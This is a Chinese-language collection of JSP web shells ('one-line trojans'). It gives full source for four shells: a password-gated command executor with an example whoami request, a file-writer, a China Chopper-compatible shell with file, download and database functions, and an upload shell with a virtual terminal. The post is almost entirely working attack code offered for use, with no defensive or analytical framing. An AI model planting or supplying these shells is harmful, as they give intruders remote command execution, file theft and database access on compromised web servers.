一句话木马:JSP篇
JSP一句话收集:
1、带密码的回显cmd马
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
请求:http://x.x.x.x/cmd.jsp??pwd=023&i=whoami
2、一句话
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
在浏览器地址栏输入http://192.168.125.138:8080/222.jsp?f=1.txt&t=hello123123
然后再输入http://127.0.0.1:8080/test/1.txt
3、jsp一句话,菜刀可直连
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> <%!String Pwd = "pass"; String EC(String s, String c) throws Exception { return s; }//new String(s.getBytes("ISO-8859-1"),c);} Connection GC(String s) throws Exception { String[] x = s.trim().split("\r\n"); Class.forName(x[0].trim()).newInstance(); Connection c = DriverManager.getConnection(x[1].trim()); if (x.length > 2) { c.setCatalog(x[2].trim()); } return c; } void AA(StringBuffer sb) throws Exception { File r[] = File.listRoots(); for (int i = 0; i < r.length; i++) { sb.append(r[i].toString().substring(0, 2)); } } void BB(String s, StringBuffer sb) throws Exception { File oF = new File(s), l[] = oF.listFiles(); String sT, sQ, sF = ""; java.util.Date dt; SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); for (int i = 0; i < l.length; i++) { dt = new java.util.Date(l[i].lastModified()); sT = fm.format(dt); sQ = l[i].canRead() ? "R" : ""; sQ += l[i].canWrite() ? " W" : ""; if (l[i].isDirectory()) { sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n"); } else { sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n"; } } sb.append(sF); } void EE(String s) throws Exception { File f = new File(s); if (f.isDirectory()) { File x[] = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { EE(x[k].getPath()); } } } f.delete(); } void FF(String s, HttpServletResponse r) throws Exception { int n; byte[] b = new byte[512]; r.reset(); ServletOutputStream os = r.getOutputStream(); BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); os.write(("->" + "|").getBytes(), 0, 3); while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.write(("|" + "<-").getBytes(), 0, 3); os.close(); is.close(); } void GG(String s, String d) throws Exception { String h = "0123456789ABCDEF"; int n; File f = new File(s); f.createNewFile(); FileOutputStream os = new FileOutputStream(f); for (int i = 0; i < d.length(); i += 2) { os .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d .charAt(i + 1)))); } os.close(); } void HH(String s, String d) throws Exception { File sf = new File(s), df = new File(d); if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (int j = 0; j < z.length; j++) { HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte[] b = new byte[512]; while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } is.close(); os.close(); } } void II(String s, String d) throws Exception { File sf = new File(s), df = new File(d); sf.renameTo(df); } void JJ(String s) throws Exception { File f = new File(s); f.mkdir(); } void KK(String s, String t) throws Exception { File f = new File(s); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt = fm.parse(t); f.setLastModified(dt.getTime()); } void LL(String s, String d) throws Exception { URL u = new URL(s); int n; FileOutputStream os = new FileOutputStream(d); HttpURLConnection h = (HttpURLConnection) u.openConnection(); InputStream is = h.getInputStream(); byte[] b = new byte[512]; while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.close(); is.close(); h.disconnect(); } void MM(InputStream is, StringBuffer sb) throws Exception { String l; BufferedReader br = new BufferedReader(new InputStreamReader(is)); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } } void NN(String s, StringBuffer sb) throws Exception { Connection c = GC(s); ResultSet r = c.getMetaData().getCatalogs(); while (r.next()) { sb.append(r.getString(1) + "\t"); } r.close(); c.close(); } void OO(String s, StringBuffer sb) throws Exception { Connection c = GC(s); String[] t = { "TABLE" }; ResultSet r = c.getMetaData().getTables(null, null, "%", t); while (r.next()) { sb.append(r.getString("TABLE_NAME") + "\t"); } r.close(); c.close(); } void PP(String s, StringBuffer sb) throws Exception { String[] x = s.trim().split("\r\n"); Connection c = GC(s); Statement m = c.createStatement(1005, 1007); ResultSet r = m.executeQuery("select * from " + x[3]); ResultSetMetaData d = r.getMetaData(); for (int i = 1; i <= d.getColumnCount(); i++) { sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t"); } r.close(); m.close(); c.close(); } void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { int i; Connection c = GC(s); Statement m = c.createStatement(1005, 1008); try { ResultSet r = m.executeQuery(q); ResultSetMetaData d = r.getMetaData(); int n = d.getColumnCount(); for (i = 1; i <= n; i++) { sb.append(d.getColumnName(i) + "\t|\t"); } sb.append("\r\n"); while (r.next()) { for (i = 1; i <= n; i++) { sb.append(EC(r.getString(i), cs) + "\t|\t"); } sb.append("\r\n"); } r.close(); } catch (Exception e) { sb.append("Result\t|\t\r\n"); try { m.executeUpdate(q); sb.append("Execute Successfully!\t|\t\r\n"); } catch (Exception ee) { sb.append(ee.toString() + "\t|\t\r\n"); } } m.close(); c.close(); }%> <% String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; request.setCharacterEncoding(cs); response.setContentType("text/html;charset=" + cs); String Z = EC(request.getParameter(Pwd) + "", cs); String z1 = EC(request.getParameter("z1") + "", cs); String z2 = EC(request.getParameter("z2") + "", cs); StringBuffer sb = new StringBuffer(""); try { sb.append("->" + "|"); if (Z.equals("A")) { String s = new File(application.getRealPath(request .getRequestURI())).getParent(); sb.append(s + "\t"); if (!s.substring(0, 1).equals("/")) { AA(sb); } } else if (Z.equals("B")) { BB(z1, sb); } else if (Z.equals("C")) { String l = ""; BufferedReader br = new BufferedReader( new InputStreamReader(new FileInputStream(new File( z1)))); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } br.close(); } else if (Z.equals("D")) { BufferedWriter bw = new BufferedWriter( new OutputStreamWriter(new FileOutputStream( new File(z1)))); bw.write(z2); bw.close(); sb.append("1"); } else if (Z.equals("E")) { EE(z1); sb.append("1"); } else if (Z.equals("F")) { FF(z1, response); } else if (Z.equals("G")) { GG(z1, z2); sb.append("1"); } else if (Z.equals("H")) { HH(z1, z2); sb.append("1"); } else if (Z.equals("I")) { II(z1, z2); sb.append("1"); } else if (Z.equals("J")) { JJ(z1); sb.append("1"); } else if (Z.equals("K")) { KK(z1, z2); sb.append("1"); } else if (Z.equals("L")) { LL(z1, z2); sb.append("1"); } else if (Z.equals("M")) { String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; Process p = Runtime.getRuntime().exec(c); MM(p.getInputStream(), sb); MM(p.getErrorStream(), sb); } else if (Z.equals("N")) { NN(z1, sb); } else if (Z.equals("O")) { OO(z1, sb); } else if (Z.equals("P")) { PP(z1, sb); } else if (Z.equals("Q")) { QQ(cs, z1, z2, sb); } } catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } sb.append("|" + "<-"); out.print(sb.toString()); %>
4、小马,上传
?p=ruphy&f=
<%@page import="java.io.*" contentType="text/html; charset=UTF-8" %> <%@page import="java.util.zip.*" contentType="text/html; charset=UTF-8" %> <%@page import="java.util.*" contentType="text/html; charset=UTF-8" %> <%@page import="java.lang.StringBuilder" contentType="text/html; charset=UTF-8" %> <%@page import="java.net.URLDecoder" contentType="text/html; charset=UTF-8" %> <%! void recursionZip(ZipOutputStream zipOut, File file, String baseDir) throws Exception { if (file.isDirectory()) { File[] files = file.listFiles(); for (File fileSec : files) { recursionZip(zipOut, fileSec, baseDir + file.getName() + File.separator); } } else { byte[] buf = new byte[1024]; InputStream input = new FileInputStream(file); zipOut.putNextEntry(new ZipEntry(baseDir + file.getName())); System.out.println(file + "压缩成功!"); int len; while ((len = input.read(buf)) != -1) { zipOut.write(buf, 0, len); } input.close(); } } boolean zip(String filepath, String zipPath) { try { File file = new File(filepath);// 要被压缩的文件夹 File zipFile = new File(zipPath); ZipOutputStream zipOut = new ZipOutputStream(new FileOutputStream(zipFile)); if (file.isDirectory()) { File[] files = file.listFiles(); for (File fileSec : files) { if (!fileSec.getAbsolutePath().equals(zipFile.getAbsolutePath())) recursionZip(zipOut, fileSec, file.getName() + File.separator); } } else { recursionZip(zipOut, file, ""); } zipOut.close(); } catch (Exception e) { return false; } return true; } void copyStream(final InputStream[] ins, final JspWriter out) { for (final InputStream in : ins) { new Thread(new Runnable() { // @Override 不兼容低版本 public void run() { if (in == null) return; try { int a = -1; byte[] b = new byte[2048]; while ((a = in.read(b)) != -1) { out.println(new String(b)); } } catch (Exception e) { } finally { try { if (in != null) in.close(); } catch (Exception ec) { } } } }).start(); } } String uploadFile(DataInputStream is, String path, int size, String sp) throws IOException { if (size > 20 * 1024 * 1024) { return "上传失败,文件太大!"; } byte bts[] = new byte[size]; int br = 0; int tbr = 0; //上传的数据保存在byte数组里面 while (tbr < size) { br = is.read(bts, tbr, size); tbr += br; } String file = new String(bts, "utf-8"); String sf = file.substring(file.indexOf("filename=\"") + 10); sf = sf.substring(0, sf.indexOf("\n")).replaceAll("/\\+", "/"); sf = sf.substring(sf.lastIndexOf("/") + 1, sf.indexOf("\"")); String fileName = path + "/" + sf; int pos; pos = file.indexOf("filename = \""); pos = file.indexOf("\n", pos) + 1; pos = file.indexOf("\n", pos) + 1; pos = file.indexOf("\n", pos) + 1; int bl = file.indexOf(sp, pos) - 4; //取得文件数据的开始的位置 int startPos = ((file.substring(0, pos)).getBytes()).length; int endPos = ((file.substring(0, bl)).getBytes()).length; File checkFile = new File(fileName); if (checkFile.exists()) { checkFile.delete(); } FileOutputStream fileOut = new FileOutputStream(fileName); fileOut.write(bts, startPos, (endPos - startPos)); fileOut.close(); return sf + "文件上传成功!"; } String getCurrentPath(String file, String p, String url) throws IOException { String path = ""; String tmpFile = file.replaceAll("/[^/]+/?$", "/"); while (!file.equals(tmpFile)) { path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file.replaceAll(tmpFile, "") + "</a>" + path; file = tmpFile; tmpFile = file.replaceAll("/[^/]+/?$", "/"); } path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file + "</a>" + path; return path; } %> <% //验证用户名 String dp = "ruphy"; response.setCharacterEncoding("UTF-8"); String url = request.getRequestURL().toString(); String p = request.getParameter("p"); if (!dp.equals(p)) { if (!"true".equals(request.getParameter("c"))) { out.println("<div style='text-align: center;'>访问失败!<span style='color: red'>密码错误!</span></div>"); out.println("<div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "?p=passwd&f=path' >" + url + "?p=passwd&f=path</a></span></div>"); out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div>"); } return; } String m = request.getParameter("m"); if (m != null && !"".equals(m.trim())) { out.println("开始执行命令: " + m); out.flush(); String[] cmds = new String[]{"sh", "-c", m}; if (System.getProperty("os.name").toLowerCase().contains("windows")) { cmds = new String[]{"cmd", "/k", m}; } Process ps = null; out.print("<xmp>"); try { ps = Runtime.getRuntime().exec(cmds); copyStream(new InputStream[]{ps.getInputStream(), ps.getErrorStream()}, out); ps.getOutputStream().close(); ps.waitFor(); } catch (Exception e) { out.println("<div>执行命令 " + m + " 发生错误!</div>"); } finally { try { if (ps != null) ps.destroy(); } catch (Exception ec) { out.println("关闭流出错!"); } } out.println("</xmp>"); out.println("<div>执行命令: " + m + " 完成!</div>"); return; } String fn = request.getParameter("f"); if (fn == null || "".equals(fn.trim())) { fn = application.getRealPath("/"); } String f = fn.replaceAll("\\\\+", "/").replaceAll("/+", "/"); String ct = request.getContentType(); if (ct != null && ct.indexOf("multipart/form-data") >= 0) { DataInputStream is = new DataInputStream(request.getInputStream()); String msg = uploadFile(is, f, request.getContentLength(), ct.substring(ct.lastIndexOf("=") + 1, ct.length())); out.println("<script>alert('" + msg + "');location.href='" + url + "?p=" + dp + "&f=" + f + "';</script>"); return; } File file = new File(f); if (!file.exists()) { out.println("<script>alert('输入目录或者文件不存在!')</script>"); } if ("true".equals(request.getParameter("t")) && file.exists()) { if (zip(f, new File(f).getAbsolutePath() + ".zip")) { out.println("<script>alert('压缩成功!');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>"); } out.println("<script>alert('压缩失败');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>"); return; } if (file.isDirectory() && file.canRead()) { StringBuilder sb = new StringBuilder(); File[] files = File.listRoots(); String roots = ""; for (int i = 0; i < files.length; i++) { roots += "<a style=\"margin-left: 10px;\" href=\"" + url + "?p=" + dp + "&f=" + files[i].getPath().replaceAll("\\\\+", "/") + "/\">" + files[i].getPath() + "</a>"; } sb.append("<div><div>"); sb.append("<div style='margin: 10px 0 0 20px'><form action=" + url + "?p=" + dp + "&f=" + f + " method='post' enctype='multipart/form-data'>文件上传: <input name='fileName' type='file'><input onclick='return confirm(\"上传到当前目录:" + f + "?\")' value='上传' type='submit'></form>"); sb.append("</div><div style='margin: 5px 0 20px 20px'><span>根目录:" + roots + "</span><span style=\"margin-left: 20px;\">当前目录:" + getCurrentPath(f, dp, url) + "</span>" + "<span style=\"margin-left: 20px;\" ><a href=\"" + url + "?p=" + dp + "&f=" + f.replaceAll("/[^/]+/?$", "/") + "\">返回上级目录</a></span>" + "</div>"); sb.append("<div style='max-height: 400px; overflow: auto; background-color: #ffe;'><table><tbody>"); files = file.listFiles(); for (int i = 0; i < files.length; i++) { if (files[i].canRead()) { sb.append("<tr>" + "<td><a style=\"margin-left: 20px;\" href='" + url + "?p=" + dp + "&f=" + f + "/" + files[i].getName() + "'>" + files[i].getName() + "</a></td>" + "<td><a style=\"margin-left: 20px;\" onclick='return confirm(\"确定删除吗?\")' href=\"" + url + "?p=" + dp + "&r=true&f=" + f + "/" + files[i].getName() + "\">删除</a></td>" + (!files[i].isFile() ? "<td></td>" : "<td><a style=\"margin-left: 20px;\" onclick=\"top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&v=true&w=true&f=" + f + "/" + files[i].getName() + "');\" href=\"#\">查看</a></td>") + "<td><a style=\"margin-left: 20px;\" href=\"" + url + "?p=" + dp + "&t=true&f=" + f + "/" + files[i].getName() + "\">压缩</a>" + "<span style=\"margin-left: 20px\">" + files[i].length() / 1024 + "KB(" + files[i].length() / 1024 / 1024 + "MB)</span></td>" + "</tr>"); } } sb.append("</tbody></table></div></div>"); sb.append("<div style='background-color: #ccc;'>"); sb.append("<div style='margin: 20px'>虚拟终端:<input id='command' type='text' value='netstat -an' style='width: 250px;border: none;color: red;background-color: black;'/>" + "<a style='color: blue' onclick=\"var m= top.document.getElementById('command').value;if(!m) return false; top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&m=' + encodeURIComponent(m));\" href=\"#\">执行</a>" + "</div>"); sb.append("<div style='margin-top: 20px; padding: 5px; height: 600px;max-height: 100%'>" + "<iframe id='view-file' src='" + url + "?c=true' height='100%' style='width: 100%; height: 100%' frameborder='0'></iframe>" + "</div>"); sb.append("</div>"); out.println(sb.toString()); out.println("<div><div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "' >" + url + "?p=passwd</a></span></div>"); out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div></div>"); sb.append("</div>"); return; } if ("true".equals(request.getParameter("r"))) { if (file.delete()) { out.println("<script>alert('删除成功!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>"); } out.println("<script>alert('删除失败!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>"); return; } if (!"true".equals(request.getParameter("v"))) { response.setContentType("application/octet-stream"); response.setHeader("Content-Disposition", "attachment; filename=" + f.replaceAll(".+/+", "").replace(" ", "_")); } else if (file.length() > 1024 * 1024 * 10) { out.println("文件太大,请下载查看!"); return; } String ctt = java.nio.file.Files.probeContentType(file.toPath()); ctt = ctt == null ? "others" : ctt.replaceAll("\\/+.*", ""); if ("true".equals(request.getParameter("w"))) { String u = url + "?p=ruphy&v=true&l=true&f=" + f; if ("video".equals(ctt)) { out.println("<div style='width: 800px'><video style='margin-top: 5px; width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>"); return; } if ("audio".equals(ctt)) { out.println("<div style='width: 300px'><audio style='width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>"); return; } if ("image".equals(ctt)) { out.println("<div style='width: 600px'><img style='margin-top: 5px; width:100%;' alt='非图片' src='" + u + "'/></div>"); return; } } if ("true".equals(request.getParameter("l"))) { OutputStream streamOut = response.getOutputStream(); InputStream streamIn = new FileInputStream(file); int length = streamIn.available(); int bytesRead = 0; byte[] buffer = new byte[1024]; while ((bytesRead = streamIn.read(buffer, 0, 1024)) != -1) { streamOut.write(buffer, 0, bytesRead); } response.flushBuffer(); streamIn.close(); streamOut.close(); return; } FileInputStream fis = new FileInputStream(file); InputStreamReader isr = new InputStreamReader(fis, "UTF-8"); BufferedReader br = new BufferedReader(isr); StringBuilder sb = new StringBuilder(); sb.append("<xmp>\n"); String line = null; while ((line = br.readLine()) != null) { sb.append(line); sb.append("\n"); } sb.append("</xmp>"); out.println(sb.toString()); fis.close(); isr.close(); br.close(); %>
本文由Bypass整理发布,转载请保留出处。
欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。